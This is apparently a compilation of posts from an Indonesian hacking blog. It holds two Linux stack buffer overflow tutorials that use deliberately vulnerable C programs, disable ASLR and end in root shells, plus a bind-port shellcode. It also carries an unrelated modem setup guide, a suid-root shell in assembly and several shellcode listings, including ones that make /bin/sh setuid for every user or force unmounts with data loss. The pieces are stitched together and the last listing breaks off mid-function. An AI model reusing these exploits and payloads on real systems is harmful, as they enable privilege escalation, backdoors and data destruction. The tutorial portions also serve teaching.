Linux buffer overflow II
Linux Buffer Overflow Tutorial
Edition : Second
Author : gunslinger_
Date : Mon Jun 28 21:38:14 WIT 2010
Contents :
1. Introduction
2. Scenario
3. The getenv() function
4. Exploitation
5. Conclusion
6. Special thanks
– Introduction
In the first edition of this tutorial I explained a buffer overflow against a 400-byte buffer.
You can read the previous tutorial here -> http://www.exploit-db.com/papers/14069/
Now I will explain "what do we do when the buffer is smaller than our payload, especially the shellcode?"
and describe the strategy for that case in this tutorial.
– Scenario
The source of the earlier application is almost identical to the one used in this tutorial;
the only difference is the buffer: this time the application has a 10-byte buffer.
Before continuing with the experiment in this scenario, don't forget to disable stack randomisation first.
root@bt:~# cat /proc/sys/kernel/randomize_va_space
2
root@bt:~# echo 0 > /proc/sys/kernel/randomize_va_space
root@bt:~# cat /proc/sys/kernel/randomize_va_space
0
root@bt:~#
———————bof2.c————————–
#include <stdio.h>
#include <string.h>

int main(int argc, char** argv)
{
    char buffer[10];
    strcpy(buffer, argv[1]);   /* no length check: deliberately vulnerable */
    return 0;
}
———————EOF—————————–
Save it as bof2.c and compile the program.
Note: when compiling, add the options -fno-stack-protector (disables the stack canary) and -mpreferred-stack-boundary=2 (4-byte stack alignment, which keeps the frame layout simple).
root@bt:~# gcc -g -o bof2 -fno-stack-protector -mpreferred-stack-boundary=2 bof2.c
So, how do we exploit it when the buffer is that small?
We can use an ENVIRONMENT VARIABLE to hold the NOP sled and the shellcode,
and then repeat the address of the NOPs until it overwrites the EIP register.
The first step is to write the shellcode out in binary form.
I will use a shellcode that binds a shell to port 13123 in this tutorial;
you can see that shellcode here : http://inj3ct0r.com/exploits/12608
root@bt:~/bof# echo -ne "\xeb\x11\x5e\x31\xc9\xb1\x65\x80\x6c\x0e\xff\x35\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x66\xf5\x66\x10\x66\x07\x85\x9f\x36\x9f\x37\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\xbe\xfb\x87\x9d\xf0\x37\x68\x78\xbe\x16\x9f\x45\x86\x8b\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\x87\x8b\xbe\x16\xe8\x39\xe5\x9b\x02\xb5\x87\x87\x8b\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\xbe\xf8\x66\xfe\xe5\x74\x02\xb5\x76\xe5\x74\x02\xb5\x76\xe5\x74\x02\xb5\x87\x9d\x64\x64\xa8\x9d\x9d\x64\x97\x9e\xa3\xbe\x18\x87\x88\xbe\x16\xe5\x40\x02\xb5" > shellcode3.bin
root@bt:~/bof# cat shellcode3.bin
ë^1ɱelÿ5éuöëèêÿÿÿfõff67¾3øå¾ûð7hx¾E¾3øå¾è9å¾3øå¾øfþåtµvåtµvåtµdd¨d£¾?¾å@µ
root@bt:~/bof#
Next, we create an ENVIRONMENT VARIABLE containing: 200 bytes of NOPSLED + SHELLCODE
root@bt:~/bof# export PAYLOAD=$(perl -e 'print "\x90" x 200')$(cat shellcode.bin)
root@bt:~/bof# echo $PAYLOAD
ë^1ɱelÿ5éuöëèêÿÿÿfõff67¾3øå¾ûð7hx¾E¾3øå¾è9å¾3øå¾øfþåtµvåtµvåtµdd¨d£¾?¾å@µ
root@bt:~/bof#
OK, we have just finished placing our PAYLOAD in the ENVIRONMENT VARIABLE.
– The getenv() function
Now we use getenv() from the C library.
getenv() returns the address of an environment variable's value (get environment variable).
So we use that function to obtain the address of the PAYLOAD we placed in the ENVIRONMENT VARIABLE earlier.
The source of the program is as follows.
———————getenv.c————————–
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char** argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s VARNAME\n", argv[0]);
        return 1;
    }
    /* getenv() returns a pointer into the process environment, or NULL if unset */
    printf("%s terletak pada address %p\n", argv[1], getenv(argv[1]));
    return 0;
}
———————EOF—————————–
Very simple, isn't it? But very useful.
Now compile the program
root@bt:~/bof# gcc -o getenv getenv.c
root@bt:~/bof#
Now we can see where our PAYLOAD is located.
root@bt:~/bof# ./getenv PAYLOAD
PAYLOAD terletak pada address 0xbffffe1e
root@bt:~/bof#
Clear enough: we easily learn that PAYLOAD is located at address 0xbffffe1e.
Then we add an offset, say 100 bytes, because we need an address that lands in the middle of the NOPSLED.
root@bt:~/bof# printf "%x\n" $((0xbffffe1e + 100))
bffffe82
root@bt:~/bof#
We now have 0xbffffe1e + 100 = bffffe82; next we convert it to little endian.
-> 82feffbf
then write it in shellcode (escaped byte) form
-> \x82\xfe\xff\xbf
– Exploitation
Now it's time to run our PAYLOAD against the application that is vulnerable to the buffer overflow.
root@bt:~/bof# ./bof2 $(perl -e 'print "\x82\xfe\xff\xbf" x 10')
Segmentation fault
root@bt:~/bof#
We get a segmentation fault because the repeated address is not yet lined up with the saved EIP.
So what now? We can prepend NOPs to shift (push) the address along one byte at a time.
root@bt:~/bof# ./bof2 $(perl -e 'print "\x90" . "\x82\xfe\xff\xbf" x 10')
Segmentation fault
root@bt:~/bof#
Still a segmentation fault; let's shift the address by one more NOP byte...
root@bt:~/bof# ./bof2 $(perl -e 'print "\x90" x 2 . "\x82\xfe\xff\xbf" x 10')
Oops, the bof program doesn't exit? What happened? Did our shellcode execute properly?
Earlier we used a bind-port shellcode listening on port 13123,
so let's open a new console tab and connect with netcat.
root@bt:~# nc localhost 13123
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
hostname
bt
echo YUMMY!
YUMMY!
We have once again succeeded in exploiting a buffer overflow.
– Conclusion
In conclusion, no matter how small an application's buffer is, a buffer overflow is still possible.
The way to prevent a buffer overflow is to limit how many bytes of user input are copied into the buffer.
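As an added example (my code, not the tutorial's), the bounded replacement for the strcpy() call in bof2.c that the conclusion calls for: the copy rejects any argument that does not fit in the 10-byte buffer together with its NUL terminator, so an oversized argv[1] gets an error instead of overwriting the saved return address. The function names bounded_copy and process_arg are my own.

```c
#include <stdio.h>
#include <string.h>

#define BUFSZ 10   /* same buffer size as bof2.c */

/* Copy src into dst[dstsz], refusing anything that would not fit together
 * with the terminating NUL. Returns 0 on success, -1 if the input is rejected.
 * Unlike strcpy(), the destination size bounds every byte written. */
int bounded_copy(char *dst, size_t dstsz, const char *src)
{
    if (dst == NULL || src == NULL || dstsz == 0)
        return -1;

    /* Measure src without ever scanning past dstsz bytes of it. */
    size_t n = 0;
    while (n < dstsz && src[n] != '\0')
        n++;

    if (n == dstsz)          /* no room left for the NUL: reject, don't truncate */
        return -1;

    memcpy(dst, src, n + 1); /* n bytes plus the NUL, all inside dst */
    return 0;
}

/* Same job as main() in bof2.c, but returns 1 when the input is rejected. */
int process_arg(const char *arg)
{
    char buffer[BUFSZ];
    if (bounded_copy(buffer, sizeof buffer, arg) != 0)
        return 1;
    return 0;
}

int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s STRING\n", argv[0]);
        return 2;
    }
    if (process_arg(argv[1]) != 0) {
        fprintf(stderr, "input too long (max %d bytes)\n", BUFSZ - 1);
        return 1;
    }
    puts("ok");
    return 0;
}
```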
– Special thanks : devilzc0de crew and jasakom crew
: www.devilzc0de.org / www.devilzc0de.com – www.jasakom.com , indonesianhacker.org, yogyacarderlink.web.id
: serverisdown.org, xc0de.or.id, echo.or.id, hacker-newbie.org, tecon-crew.org
: And all exploit database…
Linux Buffer Overflow Tutorial
Edition : First
Author : gunslinger_
Date : Sat Jun 26 20:27:41 WIT 2010
Contents :
1. Introduction
2. Exploitation concept
3. Attack vector
3.1. NOP
3.2. NOPSLED
3.3. PAYLOAD
4. Special thanks
– Introduction
After doing a lot of research on recent Linux kernels,
especially 2.6.8 and later, it is indeed no longer possible to practise the buffer overflow exploitation technique the old way.
That is why I wrote this tutorial: so that we can practise "what is a buffer overflow, really?"
on kernels 2.6.8 and later, since that is what current operating systems ship with.
In this tutorial I will explain the buffer overflow exploitation technique in detail.
– Buffer overflow exploitation concept
OK, let's get straight to the main topic. First we need to write a program that is vulnerable to a buffer overflow attack.
———————bof.c————————–
#include <stdio.h>
#include <string.h>

int main(int argc, char** argv)
{
    char buffer[400];
    strcpy(buffer, argv[1]);   /* no length check: deliberately vulnerable */
    return 0;
}
———————EOF—————————–
Save it as bof.c.
In the source above we see the strcpy() function.
strcpy() is very dangerous because it does not check or limit the length of the data we pass in.
OK, now we disable randomize_va_space so that the memory layout is predictable and easy for us to target.
Do it as follows.
root@bt:~# cat /proc/sys/kernel/randomize_va_space
2
root@bt:~# echo 0 > /proc/sys/kernel/randomize_va_space
root@bt:~# cat /proc/sys/kernel/randomize_va_space
0
root@bt:~#
Now we compile the program.
Note: when compiling, add the options -fno-stack-protector and -mpreferred-stack-boundary=2.
Like this
root@bt:~# gcc -g -o bof -fno-stack-protector -mpreferred-stack-boundary=2 bof.c
Now we find the string length needed to make the program crash.
root@bt:~# ./bof `perl -e 'print "A" x 400'`
root@bt:~# ./bof `perl -e 'print "A" x 403'`
As we can see, the data is copied into the buffer and the program exits normally
when we copy 400 to 403 "A" bytes into the buffer.
root@bt:~# ./bof `perl -e 'print "A" x 404'`
Segmentation fault
root@bt:~#
From this we know that a string of 404 bytes is needed to crash the program.
Next, we find the string length at which the EIP register is overwritten by our input.
EIP points to the next instruction to be executed, so once we overwrite EIP we can run whatever we want at that moment.
Now we use the GNU debugger, usually called gdb.
Look at the following experiment.
root@bt:~# gdb -q bof
(gdb) list
1 #include <stdio.h>
2 #include <string.h>
3
4 int main(int argc, char** argv)
5 {
6 char buffer[400];
7 strcpy(buffer, argv[1]);
8
9 return 0;
10 }
(gdb) run `perl -e 'print "A" x 404'`
Starting program: /root/bof `perl -e 'print "A" x 404'`
Program received signal SIGSEGV, Segmentation fault.
0xb7e86606 in __libc_start_main () from /lib/tls/i686/cmov/libc.so.6
(gdb) run `perl -e 'print "A" x 405'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/bof `perl -e 'print "A" x 405'`
Program received signal SIGSEGV, Segmentation fault.
0xb7e800a9 in ?? () from /lib/tls/i686/cmov/libc.so.6
(gdb)
Hmm, it looks like we haven't overwritten it yet; let's add one more character.
(gdb) run `perl -e 'print "A" x 406'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/bof `perl -e 'print "A" x 406'`
Program received signal SIGSEGV, Segmentation fault.
0xb7004141 in ?? ()
(gdb)
OK, now we can see we are close to fully overwriting EIP.
Look at -> 0xb7004141
There we see 4141; 41 is the letter "A" in hexadecimal. But we need to overwrite the whole EIP address.
(gdb) run `perl -e 'print "A" x 407'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/bof `perl -e 'print "A" x 407'`
Program received signal SIGSEGV, Segmentation fault.
0x00414141 in ?? ()
(gdb)
A little more...
(gdb) run `perl -e 'print "A" x 408'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/bof `perl -e 'print "A" x 408'`
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb)
There we see that we have completely overwritten the EIP register.
Look at -> 0x41414141
We have overwritten it with the letter "A" using a string of length 408.
(gdb) i r
eax            0x0      0
ecx            0xbffff0b7       -1073745737
edx            0x199    409
ebx            0xb7fc9ff4       -1208180748
esp            0xbffff250       0xbffff250
ebp            0x41414141       0x41414141
esi            0x8048400        134513664
edi            0x8048310        134513424
eip            0x41414141       0x41414141   <-- overwritten !!
eflags         0x210246 [ PF ZF IF RF ID ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb)
Now what we need to do is find where the ESP register (stack pointer) is.
(gdb) list 1
1 #include <stdio.h>
2 #include <string.h>
3
4 int main(int argc, char** argv)
5 {
6 char buffer[400];
7 strcpy(buffer, argv[1]);
8
9 return 0;
10 }
(gdb) b 7
Breakpoint 1 at 0x80483cd: file bof.c, line 7.
(gdb)
Note that we set the breakpoint at the vulnerable strcpy() call in order to learn where the ESP register is.
(gdb) run test to see where esp is
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/bof test to see where esp is
Breakpoint 1, main (argc=7, argv=0xbffff434) at bof.c:7
7 strcpy(buffer, argv[1]);
(gdb) i r esp
esp            0xbffff210       0xbffff210
(gdb)
ESP is located at address 0xbffff210
– Attack vector
OK, now the exploitation part. We need to build an attack vector for the exploitation.
First we need to understand what NOP, NOPSLED and PAYLOAD are.
- NOP
First I will explain what a NOP is.
In assembly, NOP is a no-op or no operation: the CPU does nothing and moves on to the next instruction.
In other words, NOPs are a stretch that is skipped over until an instruction that actually does something is reached.
Here we use NOPs to carry execution along until it reaches the instructions we want to run.
The NOP opcode is "90", or "\x90" in shellcode form.
- NOPSLED
Second, what a NOPSLED is. A NOPSLED is a run of NOPs, some number of bytes long.
For example `perl -e 'print "\x90" x 40'` gives us "\x90" 40 times (40 bytes).
- PAYLOAD
Third, what a PAYLOAD is. The PAYLOAD is the sequence of code we want executed;
the shellcode is the PAYLOAD.
Next we will work out where the NOPSLED will be placed.
We repeat that address until the EIP register is overwritten,
which finally forces the program to continue execution at an address inside the NOPs.
So we take the address in the ESP register and subtract from it, say, 300.
root@bt:~# printf "%x\n" $((0xbffff210-300))
bffff0e4
root@bt:~#
That address will land us inside the NOPSLED.
Now we need to convert that address to little endian.
-> e4f0ffbf
then write it in shellcode form.
-> \xe4\xf0\xff\xbf
Now we calculate how many times that address has to be repeated.
We know that 408 bytes are needed to overwrite the EIP register.
root@bt:~# print "%d\n" $((408 -
We subtract the length of our NOPSLED; our NOPSLED is 200 bytes long.
root@bt:~# print "%d\n" $((408 - 200
The shellcode we will use is one that gives us a shell. We can use the following shellcode:
"\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"
That shellcode is 28 bytes.
So we subtract 28 bytes for our shellcode.
root@bt:~# printf "%d\n" $((408 - 200 - 28))
180
root@bt:~#
So we have 180 bytes in which to repeat the address.
Since an address is 4 bytes long, we divide by 4.
root@bt:~# printf "%d\n" $((180/4))
45
root@bt:~#
OK, we now have the number of repetitions needed to overwrite EIP: 45.
So our payload will look like this:
NOPSLED + SHELLCODE + ESP
`perl -e 'print "\x90" x 200 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x04\xf1\xff\xbf" x 45'`
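An added example (not part of the original tutorial) that carries the arithmetic above through in C: the little-endian encoding of the sled address, the \xNN escape form used in the perl one-liners, and the repeat count 408 - 200 - 28 = 180, 180 / 4 = 45, with a check that the remainder is a whole number of 4-byte addresses. The function names addr_to_le, le_escape and address_repeats are my own.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Write a 32-bit address as the 4 bytes an x86 stack stores it in:
 * least significant byte first (little endian). */
void addr_to_le(uint32_t addr, unsigned char out[4])
{
    for (int i = 0; i < 4; i++)
        out[i] = (unsigned char)(addr >> (8 * i));
}

/* Render the 4 little-endian bytes as "\xNN" escapes, the form used in the
 * perl -e 'print ...' commands. out must hold 16 characters plus the NUL. */
void le_escape(uint32_t addr, char out[17])
{
    unsigned char b[4];
    addr_to_le(addr, b);
    snprintf(out, 17, "\\x%02x\\x%02x\\x%02x\\x%02x", b[0], b[1], b[2], b[3]);
}

/* Number of 4-byte address copies that follow NOPSLED + SHELLCODE so that the
 * input length is exactly eip_offset (408 in the tutorial). Returns -1 when the
 * sled and shellcode already exceed the offset, or when the remainder is not a
 * multiple of 4 (a partial address copy would leave EIP misaligned). */
int address_repeats(size_t eip_offset, size_t nopsled_len, size_t shellcode_len)
{
    if (nopsled_len + shellcode_len > eip_offset)
        return -1;
    size_t rest = eip_offset - nopsled_len - shellcode_len;
    if (rest % 4 != 0)
        return -1;
    return (int)(rest / 4);
}

int main(void)
{
    char esc[17];
    le_escape(0xbffff0e4u, esc);            /* the sled address computed as esp - 300 */
    printf("address in shellcode form: %s\n", esc);
    printf("address repeats: %d\n", address_repeats(408, 200, 28));
    return 0;
}
```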
Now let's run that payload directly in the debugger.
(gdb) run `perl -e 'print "\x90" x 200 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x04\xf1\xff\xbf" x 45'`
Starting program: /root/bof `perl -e 'print "\x90" x 200 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x04\xf1\xff\xbf" x 45'`
Breakpoint 1, main (argc=2, argv=0xbffff2d4) at bof.c:7
7 strcpy(buffer, argv[1]);
(gdb) continue
Continuing.
Executing new program: /bin/bash
(no debugging symbols found)
Error in re-setting breakpoint 1: No symbol table is loaded. Use the "file" command.
(no debugging symbols found)
Error in re-setting breakpoint 1: No symbol table is loaded. Use the "file" command.
(no debugging symbols found)
Error in re-setting breakpoint 1: No symbol table is loaded. Use the "file" command.
(no debugging symbols found)
Error in re-setting breakpoint 1: No symbol table is loaded. Use the "file" command.
(no debugging symbols found)
Error in re-setting breakpoint 1: No symbol table is loaded. Use the "file" command.
(no debugging symbols found)
Error in re-setting breakpoint 1: No symbol table is loaded. Use the "file" command.
(no debugging symbols found)
Error in re-setting breakpoint 1: No symbol table is loaded. Use the "file" command.
(no debugging symbols found)
Error in re-setting breakpoint 1: No symbol table is loaded. Use the "file" command.
(no debugging symbols found)
Error in re-setting breakpoint 1: No symbol table is loaded. Use the "file" command.
sh-3.2# id
uid=0(root) gid=0(root) groups=0(root)
sh-3.2# echo WIN.
WIN.
sh-3.2# exit
Program exited normally.
(gdb) quit
root@bt:~#
Congratulations! You have successfully exploited a buffer overflow!
– special thanks : devilzc0de crew and jasakom crew
: www.devilzc0de.org / www.devilzc0de.com – www.jasakom.com , indonesianhacker.org, yogyacarderlink.web.id
: serverisdown.org, xc0de.or.id, echo.or.id
How to set up Telkom Flash on BackTrack
Well, so that the author doesn't forget it someday either, there's no harm in writing it down here hehehe...
OK, here are the steps...
First open a console
then type: sudo kate /etc/wvdial.conf
then replace everything in it, overwriting it with the configuration below.
[Dialer Defaults]
Init1 = ATZ
Init2 = ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
Init3 = AT+CGDCONT=1, \"IP\", \"internet\"
Modem Type = USB Modem
ISDN = 0
New PPPD = yes
Phone = *99#
Modem = /dev/ttyUSB0
Username = PPP
Password = PPP
Baud = 3600000
Auto DNS = 1
OK, after that save it.
Then check it by typing: cat /etc/wvdial.conf
and we get something like this...
root@bt:/etc# cat wvdial.conf
[Dialer Defaults]
Init1 = ATZ
Init2 = ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
Init3 = AT+CGDCONT=1, \"IP\", \"internet\"
Modem Type = USB Modem
ISDN = 0
New PPPD = yes
Phone = *99#
Modem = /dev/ttyUSB0
Username = PPP
Password = PPP
Baud = 3600000
Auto DNS = 1
OK, that means it's correct. Note that everything in this tutorial must be done as root or with sudo.
Now it's time to connect, by typing: wvdial &
Note: don't forget the ampersand (&), so that wvdial runs in the background and is not killed when we close the console.
OK, here is what happens after typing wvdial & in the console.
root@bt:~# wvdial &
[1] 6024
WvDial: Internet dialer version 1.60
--> Cannot get information for serial port.
--> Initializing modem.
--> Sending: ATZ
ATZ
OK
--> Sending: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
OK
--> Sending: AT+CGDCONT=1, "IP", "internet"
AT+CGDCONT=1, "IP", "internet"
OK
--> Modem initialized.
--> Sending: ATDT*99#
--> Waiting for carrier.
ATDT*99#
CONNECT
--> Carrier detected. Waiting for prompt.
root@bt:~# --> Don't know what to do! Starting pppd and hoping for the best.
--> Starting pppd at Thu Jun 24 13:08:50 2010
--> Pid of pppd: 6025
--> pppd: 0õÎ[08][08]øÎ[08]XøÎ[08]
--> Using interface ppp0
--> pppd: 0õÎ[08][08]øÎ[08]XøÎ[08]
--> pppd: 0õÎ[08][08]øÎ[08]XøÎ[08]
--> pppd: 0õÎ[08][08]øÎ[08]XøÎ[08]
--> pppd: 0õÎ[08][08]øÎ[08]XøÎ[08]
--> pppd: 0õÎ[08][08]øÎ[08]XøÎ[08]
--> pppd: 0õÎ[08][08]øÎ[08]XøÎ[08]
--> local IP address 182.1.204.151
--> pppd: 0õÎ[08][08]øÎ[08]XøÎ[08]
--> remote IP address 10.64.64.64
--> pppd: 0õÎ[08][08]øÎ[08]XøÎ[08]
--> primary DNS address 114.127.208.84
--> pppd: 0õÎ[08][08]øÎ[08]XøÎ[08]
--> secondary DNS address 202.3.208.11
--> pppd: 0õÎ[08][08]øÎ[08]XøÎ[08]
root@bt:~#
At that point the modem's light stays on and stops blinking, which indicates we are connected to the internet.
OK, the output also shows that we are using the modem connection (ppp0) with IP 182.1.204.151 and remote IP 10.64.64.64; primary DNS: 114.127.208.84 and secondary DNS: 202.3.208.11.
OK, you can close your console right away and open a browser. Happy surfing!
Program setreuid 0,0 ~ execve('/bin/sh','','') ~ exit()
Here is a shell with setreuid 0,0 written in assembly language...
; program setreuid 0,0 ~ sys_execve('/bin/sh','','') ~ exit()
; programmer gunslinger_ <yudha.gunslinger@gmail.com>
global _start

_start:
    nop                 ; no operation
                        ; syscall sys_setreuid(uid_t, uid_t)
    xor eax, eax        ; clear register eax
    mov al, 70          ; syscall number 70 = setreuid
    mov ecx, edx        ; edx is empty (0), copy it to ecx so ecx is empty too
                        ; ebx (the ruid argument) is also still 0 at process start
    int 0x80            ; kernel interrupt: do it!
    jmp short end       ; unconditional jump to end

start:                  ; reached via "call start" from end; the string address is now on the stack
    nop                 ; no operation
                        ; syscall sys_execve(args1, args2, args3)
    mov al, 11          ; syscall number 11 = execve (eax is 0 after a successful setreuid)
    pop ebx             ; pop the address of '/bin/sh' off the stack
    mov ecx, edx        ; edx is empty, copy it to register ecx so ecx is empty
    int 0x80            ; kernel interrupt: do it!

                        ; syscall exit()
    xor eax, eax        ; clear register eax
    inc eax             ; increment eax: it was 0, so eax becomes 1 = syscall number 1, exit
    int 0x80            ; kernel interrupt: do it!

end:
    call start          ; call start; this pushes the address of the string below onto the stack
    db '/bin/sh', 0     ; the string '/bin/sh' (NUL terminator added so execve sees a complete path)
Compile with
gunslinger@c0debreaker:~$ nasm -f elf shell.asm
gunslinger@c0debreaker:~$ ld -s -o shell shell.o
then make it suid root
gunslinger@c0debreaker:~$ sudo chown root:root shell
[sudo] password for gunslinger:
gunslinger@c0debreaker:~$ sudo chmod 4755 shell
gunslinger@c0debreaker:~$ ./shell
#
You now have a shell with root access (suid root)
92 bytes displaying system temperature x86 linux shellcode
/*
Name : 92 bytes displaying system temperature x86 linux shellcode
Date : may, 31 2009
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web : devilzc0de.com
blog : gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (exploit-db.com)
greetz to : flyff666, whitehat, ketek, chaer, peneter, cruz3n and all devilzc0de crew
*/
#include <stdio.h>
#include <string.h>   /* for strlen() */
char *shellcode=
"\x60\x31\xc0\x31\xd2\xb0\x0b\x52\x68\x6e\x2f"
"\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x68"
"\x2d\x63\x63\x63\x89\xe1\x52\xeb\x07\x51\x53"
"\x89\xe1\xcd\x80\x61\xe8\xf4\xff\xff\xff\x2f"
"\x62\x69\x6e\x2f\x63\x61\x74\x20\x2f\x70\x72"
"\x6f\x63\x2f\x61\x63\x70\x69\x2f\x74\x68\x65"
"\x72\x6d\x61\x6c\x5f\x7a\x6f\x6e\x65\x2f\x54"
"\x48\x52\x4d\x2f\x74\x65\x6d\x70\x65\x72\x61"
"\x74\x75\x72\x65";
int main()
{
fprintf(stdout,"Length: %d\n",strlen(shellcode));
(*(void (*)()) shellcode)();
return 0;
}
48 bytes chown root:root /bin/sh x86 linux shellcode
/*
Name : 48 bytes chown root:root /bin/sh x86 linux shellcode
Date : Sat Jun 5 15:32:40 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web : http://devilzc0de.org
blog : http://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org)
greetz to : flyff666, whitehat, ketek, chaer, peneter, and all devilzc0de crew
*/
#include <stdio.h>
#include <string.h>   /* for strlen() */
char *shellcode=
"\xeb\x13" /* jmp 0x8048075 */
"\x31\xc0" /* xor %eax,%eax */
"\xb0\xb6" /* mov $0xb6,%al */
"\x5b" /* pop %ebx */
"\x31\xc9" /* xor %ecx,%ecx */
"\x31\xd2" /* xor %edx,%edx */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xor %eax,%eax */
"\xb0\x01" /* mov $0x1,%al */
"\x31\xdb" /* xor %ebx,%ebx */
"\xcd\x80" /* int $0x80 */
"\xe8\xe8\xff\xff\xff" /* call 0x8048062 */
"\x2f" /* das */
"\x68\x6f\x6d\x65\x2f" /* push $0x2f656d6f */
"\x67\x75\x6e" /* addr16 jne 0x80480f1 */
"\x73\x6c" /* jae 0x80480f1 */
"\x69\x6e\x67\x65\x72\x2f\x73"/* imul $0x732f7265,0x67(%esi),%ebp */
"\x68" /* .byte 0x68 */
"\x65" /* gs */
"\x6c" /* insb (%dx),%es "(%edi) */
"\x6c"; /* insb (%dx),%es "(%edi) */
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(shellcode));
((void (*)(void)) shellcode)();
return 0;
}
45 bytes give all user root access when execute /bin/sh x86 linux shellcode
/*
Name : 45 bytes give all user root access when execute /bin/sh x86 linux shellcode
Date : Sat Jun 5 16:10:00 2010
Author : gunslinger_
Web : http://devilzc0de.org
blog : http://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org)
greetz to : flyff666, whitehat, ketek, chaer, peneter, cruz3n and all devilzc0de crew
*/
#include <stdio.h>
#include <string.h>   /* for strlen() */
char *shellcode=
"\xeb\x1f" /* jmp 0x8048081 */
"\x31\xc0" /* xor %eax,%eax */
"\xb0\xb6" /* mov $0xb6,%al */
"\x5b" /* pop %ebx */
"\x31\xc9" /* xor %ecx,%ecx */
"\x31\xd2" /* xor %edx,%edx */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xor %eax,%eax */
"\xb0\x0f" /* mov $0xf,%al */
"\x89\xdb" /* mov %ebx,%ebx */
"\x66\xb9\xed\x09" /* mov $0x9ed,%cx */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xor %eax,%eax */
"\xb0\x01" /* mov $0x1,%al */
"\x31\xdb" /* xor %ebx,%ebx */
"\xcd\x80" /* int $0x80 */
"\xe8\xdc\xff\xff\xff" /* call 0x8048062 */
"\x2f" /* das */
"\x62\x69\x6e" /* bound %ebp,0x6e(%ecx) */
"\x2f" /* das */
"\x73\x68"; /* jae 0x80480f5 */
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(shellcode));
((void (*)(void)) shellcode)();
return 0;
}
45 bytes sys_execve("/bin/sh", "0", "0") with umask 16 (sys_umask(14)) x86 linux shellcode
/*
Name : 45 bytes sys_execve("/bin/sh", "0", "0") with umask 16 (sys_umask(14)) x86 linux shellcode
Date : may, 31 2010
Author : gunslinger_
Web : devilzc0de.com
blog : gunslinger.devilzc0de.com
tested on : linux debian
*/
int main(){
char shell[] = "\x31\xc0\x31\xdb\x31\xdb\x31\xd2\x31"
"\xc9\xb0\x3c\x31\xdb\xb3\x0e\xcd\x80"
"\xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2"
"\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff"
"\x2f\x62\x69\x6e\x2f\x73\x68";
(*(void (*)()) shell)();
}
force unmount "/media/disk" x86 linux shellcode (some data cause lost)
/*
Title : force unmount "/media/disk" x86 linux shellcode (some data cause lost)
Name : 33 bytes force unmount "/media/disk" linux x68 shellcode
Date : Fri Jun 4 13:15:51 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web : http://devilzc0de.org
blog : http://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org)
greetz to : flyff666, whitehat, ketek, chaer, peneter, and all devilzc0de crew
*/
#include <stdio.h>
#include <string.h>   /* for strlen() */
char *shellcode=
"\xeb\x0f" /* jmp 0x8048071 */
"\x31\xc0" /* xor %eax,%eax */
"\xb0\x34" /* mov $0x34,%al */
"\x5b" /* pop %ebx */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xor %eax,%eax */
"\xb0\x01" /* mov $0x1,%al */
"\x31\xdb" /* xor %ebx,%ebx */
"\xcd\x80" /* int $0x80 */
"\xe8\xec\xff\xff\xff" /* call 0x8048062 */
"\x2f" /* das */
"\x6d" /* insl (%dx),%es:(%edi) */
"\x65\x64\x69\x61\x2f\x64\x69"/* imul $0x6b736964,%fs:%gs:0x2f(%ecx),%esp */
"\x73\x6b";
int main(void)
{
